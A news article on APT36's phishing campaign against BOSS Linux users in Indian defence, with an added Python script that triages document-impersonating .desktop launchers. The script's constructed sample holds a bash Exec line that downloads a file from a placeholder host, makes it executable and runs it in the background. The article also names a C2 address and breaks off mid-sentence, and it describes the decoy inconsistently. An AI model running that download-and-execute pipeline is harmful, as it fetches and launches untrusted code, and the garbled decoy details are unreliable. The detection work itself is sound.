- APT36 leveraged the popularity of BOSS Linux to compromise sensitive networks connected to national security.
- The attackers use a visual decoy in the form of an HTML document pretending to be a cybersecurity advisory.
- Upon execution, a malicious ELF binary exfiltrates data and monitors compromised systems.
A cyber-espionage campaign run by the threat actor APT36, also known as Transparent Tribe, is targeting Indian defense personnel and organizations that use BOSS Linux, a distribution widely deployed across Indian government agencies. The initial lure is a malicious archive attached to a phishing email.
This incident marks a notable shift in APT36’s tradecraft: the group is now deploying malware engineered specifically for Linux environments rather than relying on Windows tooling alone.
According to CYFIRMA’s research, the attack begins with highly targeted phishing emails containing ZIP file attachments. Within these attachments lies a malicious .desktop file masquerading as a “Cyber-Security-Advisory.”

Upon execution, the .desktop file initiates a multi-stage process designed to evade detection and lower the victim’s suspicion.
It opens a decoy PowerPoint presentation to hold the target’s attention while simultaneously executing a malicious ELF (Executable and Linkable Format) binary in the background.
An HTML file containing an

Known as “BOSS.elf,” this binary enables unauthorized access to the target system, allowing for data exfiltration and advanced surveillance operations.
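The lure pattern described above, a .desktop launcher that looks like a document but runs a shell pipeline to fetch a decoy and start a background payload, is one a defender can triage mechanically. The following is an added example written for this article, not code from CYFIRMA, BOSS Linux or the campaign; the two .desktop entries and the 203.0.113.10 host in them are constructed to resemble the described behaviour and are not taken from real samples. The check flags a Name with a document extension on a Type=Application entry, an Exec that invokes an interpreter, downloads content, marks a file executable, or backgrounds one command while another (the decoy viewer) runs.

```python
"""Triage .desktop files for document-impersonating launchers.

Added example for this article; not CYFIRMA's, BOSS Linux's or the
campaign's code.  The sample entries below are constructed, not real.
"""
import configparser
import re
import shlex

# Constructed sample resembling the described lure (hypothetical host).
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pptx
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "curl -s http://203.0.113.10/a.pptx -o /tmp/a.pptx; curl -s http://203.0.113.10/b -o /tmp/b; chmod +x /tmp/b; nohup /tmp/b & xdg-open /tmp/a.pptx"
"""

# Constructed benign control: an ordinary launcher for a text editor.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Terminal=false
Exec=gnome-text-editor %U
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|pptx?|xlsx?|odt|odp|txt)$", re.I)
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
DOWNLOADERS = {"curl", "wget"}
DECOY_VIEWERS = {"xdg-open", "libreoffice", "evince", "okular"}
# A single '&' (not '&&' or '|&') backgrounds the preceding command.
SINGLE_AMP = re.compile(r"(?<![&|])&(?!&)")


def parse_desktop(text):
    """Parse a .desktop file; only '=' separates keys, so URLs survive."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keys are case-sensitive in the spec
    cp.read_string(text)
    return cp["Desktop Entry"]


def triage_desktop(text):
    """Return human-readable findings; an empty list means nothing matched."""
    entry = parse_desktop(text)
    findings = []
    name = entry.get("Name", "")
    exec_line = entry.get("Exec", "")

    if entry.get("Type") == "Application" and DOC_EXT.search(name):
        findings.append(f"Name looks like a document but Type=Application: {name!r}")

    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    if argv and argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
        findings.append(f"Exec invokes an interpreter directly: {argv[0]}")

    # Everything after 'bash -c' is one quoted string, so scan the raw line.
    words = set(re.findall(r"[A-Za-z0-9_./+-]+", exec_line))
    for tool in sorted(DOWNLOADERS & words):
        findings.append(f"Exec downloads content with {tool}")
    if "chmod" in words and "+x" in words:
        findings.append("Exec marks a downloaded file executable (chmod +x)")
    if "nohup" in words or "setsid" in words or SINGLE_AMP.search(exec_line):
        findings.append("Exec backgrounds a process while another command runs")
    if findings and (DECOY_VIEWERS & words):
        findings.append("Exec also opens a document, consistent with a decoy")
    return findings


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, triage_desktop(sample))
```

Run it over `~/.local/share/applications`, `/usr/share/applications` and any .desktop file extracted from a mail attachment; the benign control produces no findings, while the constructed lure trips every check. The decoy-viewer finding is only reported alongside other hits, since opening a document is normal behaviour on its own.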
Further technical analysis reveals that the malware collects system information, performs reconnaissance on the host, and maintains persistent communication with a command-and-control (C2) server at 101.99.92.182.
The ‘sorlastore’ domain has also been used in malicious macro-embedded PowerPoint Add-in (PPAM) campaigns targeting Windows.
The campaign’s complexity demonstrates a significant escalation in Transparent Tribe’s capabilities and highlights the exposure of critical systems. APT36 has leveraged the popularity of BOSS Linux to compromise sensitive networks connected to national security.
This social engineering approach, impersonating official entities, is widely used; a recent example is the Russia-affiliated Void Blizzard APT sending fake European Defense & Security Summit emails.